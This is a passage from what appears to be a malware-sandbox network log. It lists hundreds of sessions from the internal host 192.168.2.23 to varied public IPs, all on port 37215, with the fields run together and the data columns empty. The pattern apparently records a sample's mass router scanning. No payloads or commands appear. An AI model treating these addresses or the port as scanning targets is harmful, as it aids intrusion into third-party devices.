                                          16790192.168.2.233451441.200.102.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16791192.168.2.234197841.123.115.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16792192.168.2.2334080157.220.54.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16793192.168.2.2355454197.187.253.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16794192.168.2.2343362171.172.14.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16795192.168.2.234104041.232.80.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16796192.168.2.2341294147.178.241.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16797192.168.2.2346344157.156.174.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16798192.168.2.235238641.190.241.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16799192.168.2.235275241.30.87.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16800192.168.2.2333876157.9.248.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16801192.168.2.235577841.40.102.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16802192.168.2.2334644197.96.82.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16803192.168.2.2338014197.193.141.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16804192.168.2.234967641.218.30.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16805192.168.2.2338168157.208.69.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16806192.168.2.2343954157.92.61.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16807192.168.2.235524241.76.56.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16808192.168.2.2353144197.171.152.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16809192.168.2.2343566197.183.112.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16810192.168.2.2332984197.135.251.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16811192.168.2.235526048.39.43.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16812192.168.2.234735098.24.116.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16813192.168.2.236005041.172.39.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16814192.168.2.2355070157.147.235.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16815192.168.2.2344176197.194.51.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16816192.168.2.233616847.50.177.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16817192.168.2.2360258104.174.252.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16818192.168.2.2333198157.229.84.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16819192.168.2.235507041.138.115.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16820192.168.2.2360686197.153.194.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16821192.168.2.2357018157.118.162.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16822192.168.2.234792441.206.26.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16823192.168.2.2359208197.70.227.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16824192.168.2.2340672105.118.84.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16825192.168.2.2355280177.68.108.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16826192.168.2.2345520157.199.133.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16827192.168.2.2337342197.138.77.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16828192.168.2.233550441.182.202.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16829192.168.2.2339888157.223.166.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16830192.168.2.234012682.20.96.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16831192.168.2.2351332157.203.108.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16832192.168.2.2357602173.182.251.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16833192.168.2.2352670157.174.62.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16834192.168.2.235541641.234.122.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16835192.168.2.2348288146.75.15.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16836192.168.2.2343896157.79.165.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16837192.168.2.23487109.117.94.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16838192.168.2.235263887.154.184.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16839192.168.2.235617041.228.81.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16840192.168.2.234247441.217.252.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16841192.168.2.2353950157.33.248.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16842192.168.2.2351706185.211.134.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16843192.168.2.2351688197.31.190.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16844192.168.2.2355718197.147.108.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16845192.168.2.235552441.31.185.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16846192.168.2.2347536197.42.155.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16847192.168.2.2355586197.63.217.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16848192.168.2.2345668157.155.216.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16849192.168.2.233428841.151.252.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16850192.168.2.2334766157.57.178.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16851192.168.2.2340342157.56.250.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16852192.168.2.235537841.192.52.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16853192.168.2.2333652203.111.161.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16854192.168.2.2346664157.99.148.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16855192.168.2.2348740157.194.234.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16856192.168.2.2339170204.248.254.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16857192.168.2.234783231.164.230.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16858192.168.2.233302685.114.177.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16859192.168.2.2345688102.152.18.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16860192.168.2.2352414197.229.97.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16861192.168.2.2353326197.222.143.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16862192.168.2.2346586197.87.172.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16863192.168.2.2336406197.67.43.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16864192.168.2.235626441.156.222.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16865192.168.2.2339140157.146.135.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16866192.168.2.2343570157.201.86.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16867192.168.2.235610041.26.5.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16868192.168.2.2354388157.82.113.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16869192.168.2.234224441.204.142.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16870192.168.2.235095274.218.101.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16871192.168.2.2333214197.169.223.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16872192.168.2.233983099.1.43.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16873192.168.2.234524441.63.198.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16874192.168.2.2332768157.124.70.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16875192.168.2.2352638197.98.68.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16876192.168.2.2338452197.240.90.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16877192.168.2.2349970197.88.6.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16878192.168.2.2335316165.6.154.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16879192.168.2.2339182157.242.76.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16880192.168.2.2337134157.163.103.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16881192.168.2.2344762168.140.248.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16882192.168.2.234198441.232.24.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16883192.168.2.2352748197.70.108.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16884192.168.2.233674641.142.138.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16885192.168.2.2351774193.36.61.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16886192.168.2.2354318197.16.42.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16887192.168.2.2349672115.169.102.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16888192.168.2.23422541.8.115.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16889192.168.2.2336764204.82.111.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16890192.168.2.233581641.182.57.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16891192.168.2.2351856157.190.53.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16892192.168.2.236046241.217.38.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16893192.168.2.2355468197.23.218.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16894192.168.2.2353552157.104.57.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16895192.168.2.2335354197.81.50.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16896192.168.2.2341066157.211.166.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16897192.168.2.2334652157.66.239.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16898192.168.2.2353486197.167.63.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16899192.168.2.2345030197.231.203.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16900192.168.2.234998642.140.218.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16901192.168.2.2347440197.161.36.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16902192.168.2.234001641.181.34.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16903192.168.2.235968641.170.248.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16904192.168.2.235270275.224.8.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16905192.168.2.2348190197.239.254.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16906192.168.2.2337914112.38.145.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16907192.168.2.2360894134.162.70.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16908192.168.2.2351262155.12.171.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16909192.168.2.234219241.242.18.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16910192.168.2.2347006157.122.104.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16911192.168.2.2333118197.241.21.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16912192.168.2.233713841.129.23.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16913192.168.2.235138041.102.136.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16914192.168.2.2334712154.254.177.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16915192.168.2.234615041.163.146.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16916192.168.2.234856841.127.7.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16917192.168.2.2358736157.121.77.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16918192.168.2.234773241.167.210.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16919192.168.2.23439629.71.195.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16920192.168.2.2357606197.1.137.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16921192.168.2.2352634157.5.16.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16922192.168.2.235365041.218.255.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16923192.168.2.2340660157.154.187.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16924192.168.2.234643641.179.118.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16925192.168.2.233474441.94.222.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16926192.168.2.234188661.36.144.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16927192.168.2.235612041.63.57.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16928192.168.2.2357434143.57.163.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16929192.168.2.235822246.25.229.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16930192.168.2.234336286.52.204.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16931192.168.2.2359196197.51.237.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16932192.168.2.2335382197.218.231.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16933192.168.2.234665241.25.106.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16934192.168.2.235230041.164.102.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16935192.168.2.2348390130.25.99.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16936192.168.2.2359200188.251.9.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16937192.168.2.2360678136.5.211.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16938192.168.2.2335754157.66.248.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16939192.168.2.2358036139.176.57.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16940192.168.2.2334312157.72.57.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16941192.168.2.2339426157.166.133.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16942192.168.2.2339938133.108.184.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16943192.168.2.234878041.93.56.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16944192.168.2.2339268157.48.129.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16945192.168.2.2333046197.218.224.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16946192.168.2.2335942157.238.106.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16947192.168.2.2334546197.121.70.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16948192.168.2.234155841.11.235.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16949192.168.2.234684241.182.248.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16950192.168.2.2345034137.46.217.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16951192.168.2.2333476157.181.162.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16952192.168.2.2360836197.240.219.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16953192.168.2.234987641.128.238.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16954192.168.2.2333902181.12.40.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16955192.168.2.2359388157.35.191.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16956192.168.2.2344016157.159.120.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16957192.168.2.2336012157.22.112.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16958192.168.2.235478693.194.111.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16959192.168.2.2336080148.254.177.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16960192.168.2.2354998157.250.152.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16961192.168.2.2358598180.67.61.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16962192.168.2.2349350157.27.116.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16963192.168.2.2335964197.37.45.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16964192.168.2.2338514197.67.80.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16965192.168.2.2354870157.90.98.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16966192.168.2.2344788157.81.15.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16967192.168.2.233388625.229.14.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16968192.168.2.2347476197.37.192.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16969192.168.2.2354898157.133.180.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16970192.168.2.2333410197.125.205.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16971192.168.2.2342740197.221.64.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16972192.168.2.2340132197.108.23.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16973192.168.2.2336110197.172.165.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16974192.168.2.233776841.119.173.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16975192.168.2.2360476197.92.156.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16976192.168.2.2349796197.143.80.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16977192.168.2.2336106197.67.193.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16978192.168.2.2356094197.114.191.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16979192.168.2.2355996197.232.236.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16980192.168.2.2342698157.124.5.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16981192.168.2.233864041.46.178.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16982192.168.2.233874641.241.39.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16983192.168.2.2348292157.50.176.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16984192.168.2.235898041.113.213.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16985192.168.2.2341276197.240.63.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16986192.168.2.235892841.235.112.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16987192.168.2.2338862197.240.254.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16988192.168.2.2334406164.64.236.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16989192.168.2.2353484197.183.33.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16990192.168.2.2334522197.215.165.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16991192.168.2.2359026157.136.242.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16992192.168.2.2339040187.198.197.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16993192.168.2.235923467.174.175.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16994192.168.2.2340090197.166.249.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16995192.168.2.2360948157.42.53.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16996192.168.2.2350544157.96.237.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16997192.168.2.2337110157.170.245.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16998192.168.2.235231441.254.77.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16999192.168.2.2344536196.143.131.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17000192.168.2.234459841.138.211.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17001192.168.2.2336026197.24.26.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17002192.168.2.2343102157.191.133.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17003192.168.2.235392857.98.218.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17004192.168.2.2353890157.19.252.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17005192.168.2.235543641.147.196.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17006192.168.2.2359324157.121.32.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17007192.168.2.2335770157.226.18.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17008192.168.2.2343896202.71.94.16237215
